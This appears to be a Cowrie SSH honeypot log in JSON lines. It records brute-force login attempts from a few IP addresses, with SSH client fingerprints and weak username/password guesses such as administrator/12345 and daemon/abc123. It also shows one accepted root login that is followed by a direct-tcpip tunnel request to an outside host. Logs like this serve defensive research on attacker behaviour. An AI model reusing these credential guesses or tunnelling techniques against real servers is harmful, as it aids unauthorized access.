{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T12:06:19.661143Z","src_ip":"212.227.125.160","session":"e34a884c0d00"}
{"eventid":"cowrie.client.kex","hassh":"6a77bbd6ef48d6a9959a47aa4a42a505","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 6a77bbd6ef48d6a9959a47aa4a42a505","sensor":"my-vps","timestamp":"2025-08-28T12:06:19.775306Z","src_ip":"212.227.125.160","session":"e34a884c0d00"}
{"eventid":"cowrie.login.success","username":"root","password":"broadguam1","message":"login attempt [root/broadguam1] succeeded","sensor":"my-vps","timestamp":"2025-08-28T12:06:20.119909Z","src_ip":"212.227.125.160","session":"e34a884c0d00"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"178.20.45.148","dst_port":80,"src_ip":"212.227.125.160","src_port":0,"message":"direct-tcp connection request to 178.20.45.148:80 from 0.0.0.0:0","sensor":"my-vps","timestamp":"2025-08-28T12:06:20.235084Z","session":"e34a884c0d00"}
{"eventid":"cowrie.session.closed","duration":46.15233135223389,"message":"Connection lost after 46 seconds","sensor":"my-vps","timestamp":"2025-08-28T12:06:26.267954Z","src_ip":"212.227.235.229","session":"a6cb7561f592"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":53728,"dst_ip":"1.2.3.4","dst_port":22,"session":"a7dd08c5be47","protocol":"ssh","message":"New connection: 212.227.125.160:53728 (1.2.3.4:22) [session: a7dd08c5be47]","sensor":"my-vps","timestamp":"2025-08-28T12:06:35.199942Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T12:06:35.299826Z","src_ip":"212.227.125.160","session":"a7dd08c5be47"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T12:06:35.406077Z","src_ip":"212.227.125.160","session":"a7dd08c5be47"}
{"eventid":"cowrie.login.failed","username":"administrator","password":"123456789","message":"login attempt [administrator/123456789] failed","sensor":"my-vps","timestamp":"2025-08-28T12:06:36.141879Z","src_ip":"212.227.125.160","session":"a7dd08c5be47"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T12:06:37.317038Z","src_ip":"212.227.125.160","session":"a7dd08c5be47"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865","size":524,"shasum":"4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T12:06:55.811606Z","src_ip":"212.227.125.160","session":"61c7b33d70ea"}
{"eventid":"cowrie.session.closed","duration":180.12778210639954,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-08-28T12:06:55.815994Z","src_ip":"212.227.125.160","session":"61c7b33d70ea"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":59200,"dst_ip":"1.2.3.4","dst_port":22,"session":"626708c9cfbe","protocol":"ssh","message":"New connection: 212.227.125.160:59200 (1.2.3.4:22) [session: 626708c9cfbe]","sensor":"my-vps","timestamp":"2025-08-28T12:07:15.820750Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T12:07:15.821690Z","src_ip":"212.227.125.160","session":"626708c9cfbe"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T12:07:15.995852Z","src_ip":"212.227.125.160","session":"626708c9cfbe"}
{"eventid":"cowrie.login.failed","username":"administrator","password":"12345","message":"login attempt [administrator/12345] failed","sensor":"my-vps","timestamp":"2025-08-28T12:07:16.557909Z","src_ip":"212.227.125.160","session":"626708c9cfbe"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T12:07:17.743554Z","src_ip":"212.227.125.160","session":"626708c9cfbe"}
{"eventid":"cowrie.session.closed","duration":"70.0","message":"Connection lost after 70.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T12:07:29.661744Z","src_ip":"212.227.125.160","session":"e34a884c0d00"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":55778,"dst_ip":"1.2.3.4","dst_port":22,"session":"424b1df999d5","protocol":"ssh","message":"New connection: 212.227.125.160:55778 (1.2.3.4:22) [session: 424b1df999d5]","sensor":"my-vps","timestamp":"2025-08-28T12:07:58.013450Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T12:07:58.014178Z","src_ip":"212.227.125.160","session":"424b1df999d5"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T12:07:58.396101Z","src_ip":"212.227.125.160","session":"424b1df999d5"}
{"eventid":"cowrie.login.failed","username":"administrator","password":"12345678","message":"login attempt [administrator/12345678] failed","sensor":"my-vps","timestamp":"2025-08-28T12:07:58.951811Z","src_ip":"212.227.125.160","session":"424b1df999d5"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T12:08:00.161757Z","src_ip":"212.227.125.160","session":"424b1df999d5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":55016,"dst_ip":"1.2.3.4","dst_port":22,"session":"67ed86eaa176","protocol":"ssh","message":"New connection: 212.227.125.160:55016 (1.2.3.4:22) [session: 67ed86eaa176]","sensor":"my-vps","timestamp":"2025-08-28T12:08:39.908385Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T12:08:39.911955Z","src_ip":"212.227.125.160","session":"67ed86eaa176"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T12:08:40.075316Z","src_ip":"212.227.125.160","session":"67ed86eaa176"}
{"eventid":"cowrie.login.failed","username":"administrator","password":"qwerty","message":"login attempt [administrator/qwerty] failed","sensor":"my-vps","timestamp":"2025-08-28T12:08:41.230489Z","src_ip":"212.227.125.160","session":"67ed86eaa176"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T12:08:42.500548Z","src_ip":"212.227.125.160","session":"67ed86eaa176"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":36114,"dst_ip":"1.2.3.4","dst_port":22,"session":"29800edfb4f0","protocol":"ssh","message":"New connection: 212.227.125.160:36114 (1.2.3.4:22) [session: 29800edfb4f0]","sensor":"my-vps","timestamp":"2025-08-28T12:09:22.275582Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T12:09:22.277341Z","src_ip":"212.227.125.160","session":"29800edfb4f0"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-28T12:09:22.476489Z","src_ip":"212.227.125.160","session":"29800edfb4f0"}
{"eventid":"cowrie.login.failed","username":"administrator","password":"123123","message":"login attempt [administrator/123123] failed","sensor":"my-vps","timestamp":"2025-08-28T12:09:23.333221Z","src_ip":"212.227.125.160","session":"29800edfb4f0"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T12:09:24.609815Z","src_ip":"212.227.125.160","session":"29800edfb4f0"}
{"eventid":"cowrie.session.connect","src_ip":"80.94.95.15","src_port":59760,"dst_ip":"1.2.3.4","dst_port":22,"session":"40fb88a9eb0e","protocol":"ssh","message":"New connection: 80.94.95.15:59760 (1.2.3.4:22) [session: 40fb88a9eb0e]","sensor":"my-vps","timestamp":"2025-08-28T12:09:37.464391Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T12:09:37.465322Z","src_ip":"80.94.95.15","session":"40fb88a9eb0e"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T12:09:37.522496Z","src_ip":"80.94.95.15","session":"40fb88a9eb0e"}
{"eventid":"cowrie.login.failed","username":"daemon","password":"daemon","message":"login attempt [daemon/daemon] failed","sensor":"my-vps","timestamp":"2025-08-28T12:09:37.813199Z","src_ip":"80.94.95.15","session":"40fb88a9eb0e"}
{"eventid":"cowrie.login.failed","username":"daemon","password":"abc123","message":"login attempt [daemon/abc123] failed","sensor":"my-vps","timestamp":"2025-08-28T12:09:38.898550Z","src_ip":"80.94.95.15","session":"40fb88a9eb0e"}
{"eventid":"cowrie.login.failed","username":"daemon","password":"abcd123","message":"login attempt [daemon/abcd123] failed","sensor":"my-vps","timestamp":"2025-08-28T12:09:39.952729Z","src_ip":"80.94.95.15","session":"40fb88a9eb0e"}
{"eventid":"cowrie.login.failed","username":"daemon","password":"abcd1234","message":"login attempt [daemon/abcd1234] failed","sensor":"my-vps","timestamp":"2025-08-28T12:09:41.006011Z","src_ip":"80.94.95.15","session":"40fb88a9eb0e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":40872,"dst_ip":"1.2.3.4","dst_port":22,"session":"9c64a2986af8","protocol":"ssh","message":"New connection: 212.227.125.160:40872 (1.2.3.4:22) [session: 9c64a2986af8]","sensor":"my-vps","timestamp":"2025-08-28T12:09:41.413268Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T12:09:41.741750Z","src_ip":"212.227.125.160","session":"9c64a2986af8"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","ssh-rsa"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-08-28T12:09:41.742460Z","src_ip":"212.227.125.160","session":"9c64a2986af8"}
{"eventid":"cowrie.login.failed","username":"daemon","password":"abc1234","message":"login attempt [daemon/abc1234] failed","sensor":"my-vps","timestamp":"2025-08-28T12:09:42.059292Z","src_ip":"80.94.95.15","session":"40fb88a9eb0e"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T12:09:42.585777Z","src_ip":"212.227.125.160","session":"9c64a2986af8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":40882,"dst_ip":"1.2.3.4","dst_port":22,"session":"471bd4ec62da","protocol":"ssh","message":"New connection: 212.227.125.160:40882 (1.2.3.4:22) [session: 471bd4ec62da]","sensor":"my-vps","timestamp":"2025-08-28T12:09:42.756327Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T12:09:43.034239Z","src_ip":"212.227.125.160","session":"471bd4ec62da"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-08-28T12:09:43.035299Z","src_ip":"212.227.125.160","session":"471bd4ec62da"}
{"eventid":"cowrie.session.closed","duration":"5.7","message":"Connection lost after 5.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T12:09:43.122818Z","src_ip":"80.94.95.15","session":"40fb88a9eb0e"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T12:09:43.923879Z","src_ip":"212.227.125.160","session":"471bd4ec62da"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":40896,"dst_ip":"1.2.3.4","dst_port":22,"session":"4448a1705684","protocol":"ssh","message":"New connection: 212.227.125.160:40896 (1.2.3.4:22) [session: 4448a1705684]","sensor":"my-vps","timestamp":"2025-08-28T12:09:44.090113Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T12:09:44.352024Z","src_ip":"212.227.125.160","session":"4448a1705684"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-08-28T12:09:44.352698Z","src_ip":"212.227.125.160","session":"4448a1705684"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T12:09:45.254969Z","src_ip":"212.227.125.160","session":"4448a1705684"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":51656,"dst_ip":"1.2.3.4","dst_port":22,"session":"6d0b7464cb42","protocol":"ssh","message":"New connection: 212.227.125.160:51656 (1.2.3.4:22) [session: 6d0b7464cb42]","sensor":"my-vps","timestamp":"2025-08-28T12:10:02.719584Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T12:10:02.729810Z","src_ip":"212.227.125.160","session":"6d0b7464cb42"}
